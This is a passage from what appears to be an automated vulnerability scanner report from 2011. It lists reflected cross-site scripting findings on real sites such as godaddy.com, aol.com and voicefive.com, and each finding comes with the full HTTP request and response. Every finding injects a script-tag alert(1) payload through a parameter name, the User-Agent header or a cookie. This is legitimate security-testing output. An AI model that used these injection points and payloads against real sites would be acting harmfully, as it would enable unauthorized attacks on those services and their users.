The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a40b1"-alert(1)-"ce34c6a708f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /hub/app-reviews?a40b1"-alert(1)-"ce34c6a708f=1 HTTP/1.1
Host: www.tuaw.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size7b4de%22%3E%3Cscript%3Ealert(1)%3C/script%3E118786fa1f1=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:21 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 14:06:21 GMT; path=/
Content-Type: text/html
Content-Length: 32731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>iPhone and iPod touc
...[SNIP]...
l="wb.tuaw";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,tuaw.com";
s_265.mmxgo = true;
s_265.prop1="Tech";
s_265.prop2="show-hub-apps";
s_265.prop12="http://www.tuaw.com/hub/app-reviews?a40b1"-alert(1)-"ce34c6a708f=1";
s_265.prop16="TUAW";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="mtc";
s_265.prop22="16";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.215. https://www.godaddy.com/gdshop/hosting/landing.asp [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/hosting/landing.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 4ed38<script>alert(1)</script>672c0d44255 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4ed38<script>alert(1)</script>672c0d44255
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:59 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=MOIOEHOALFKFLEHAKEPOPGGK; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4ed38<script>alert(1)</script>672c0d44255</b>
...[SNIP]...

5.216. https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/registrar/search.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 7508f<script>alert(1)</script>c497b79206d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7508f<script>alert(1)</script>c497b79206d
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:46 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=AMIOEHOAKNNAOPGJAGICKMHH; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7508f<script>alert(1)</script>c497b79206d</b>
...[SNIP]...

5.217. https://www.godaddy.com/gdshop/website.asp [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/website.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 55b68<script>alert(1)</script>34586a0b13b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)55b68<script>alert(1)</script>34586a0b13b
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:42 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FLIOEHOAOGCDEGEAJKDIKAPM; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)55b68<script>alert(1)</script>34586a0b13b</b>
...[SNIP]...

5.218. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the HTML document as plain text between tags. The payload 28c59<script>alert(1)</script>3c167e635e5 was submitted in the C3UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=1301457219130361380328c59<script>alert(1)</script>3c167e635e5; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:02 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 01:00:02 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-02_2368081451304557202; expires=Tue, 03-May-2016 01:00:02 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_2368081451304557202; expires=Thu, 05-May-2011 01:15:02 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='1301457219130361380328c59<script>alert(1)</script>3c167e635e5';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='2368081451304557202';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcal
...[SNIP]...

5.219. http://aol.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://aol.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53936"><script>alert(1)</script>e289bae907e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?53936"><script>alert(1)</script>e289bae907e=1 HTTP/1.1
Host: aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1303579081524-New%7C1366651081524%3B%20s_nrgvo%3DNew%7C1366651081525%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:56:42 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:26:42 GMT
Content-length: 131
Content-type: text/html
Location: http://www.aol.com/?53936"><script>alert(1)</script>e289bae907e=1

<html>
<body>
Page relocated <a href="http://www.aol.com/?53936"><script>alert(1)</script>e289bae907e=1">here.</a>
</body>
</html>

5.220. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 80574<script>alert(1)</script>047c0d9a986 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p90452457&PRAd=310177527&AR_C=211671722 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/310177527/direct;wi.300;hi.250/01/557100524?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1539894;BnId=1;itime=557100524;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:51182:56419:56148:57362:56835:51186:56673:56780:50220:56969:56299:54057:56987:50229:54063:57144:60183:60130;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=180574<script>alert(1)</script>047c0d9a986; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:58:52 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p90452457=exp=1&initExp=Thu May 5 00:58:52 2011&recExp=Thu May 5 00:58:52 2011&prad=310177527&arc=211671722&; expires=Wed 03-Aug-2011 00:58:52 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27200

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"310177527",Pid:"p90452457",Arc:"211671722",Location:
...[SNIP]...
91151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "BMX_3PC": '180574<script>alert(1)</script>047c0d9a986', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...

5.221. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload f3e1c<script>alert(1)</script>9b64d9a99cd was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p90452457&PRAd=310177527&AR_C=211671722 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/310177527/direct;wi.300;hi.250/01/557100524?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1539894;BnId=1;itime=557100524;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:51182:56419:56148:57362:56835:51186:56673:56780:50220:56969:56299:54057:56987:50229:54063:57144:60183:60130;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2Cf3e1c<script>alert(1)</script>9b64d9a99cd

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:58:52 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p90452457=exp=1&initExp=Thu May 5 00:58:52 2011&recExp=Thu May 5 00:58:52 2011&prad=310177527&arc=211671722&; expires=Wed 03-Aug-2011 00:58:52 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27200

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"310177527",Pid:"p90452457",Arc:"211671722",Location:
...[SNIP]...
060&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2Cf3e1c<script>alert(1)</script>9b64d9a99cd', "ar_s_p81479006": '1', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&
...[SNIP]...

5.222. http://ar.voicefive.com/bmx3/broker.pli [UID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 61ce0<script>alert(1)</script>9a7f3357ce4 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-130334904661ce0<script>alert(1)</script>9a7f3357ce4

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
;
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '875e3f1e-184.84.247.65-130334904661ce0<script>alert(1)</script>9a7f3357ce4', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p97174789": 'exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 1
...[SNIP]...

5.223. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload a61c2<script>alert(1)</script>8ddd6783f06 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

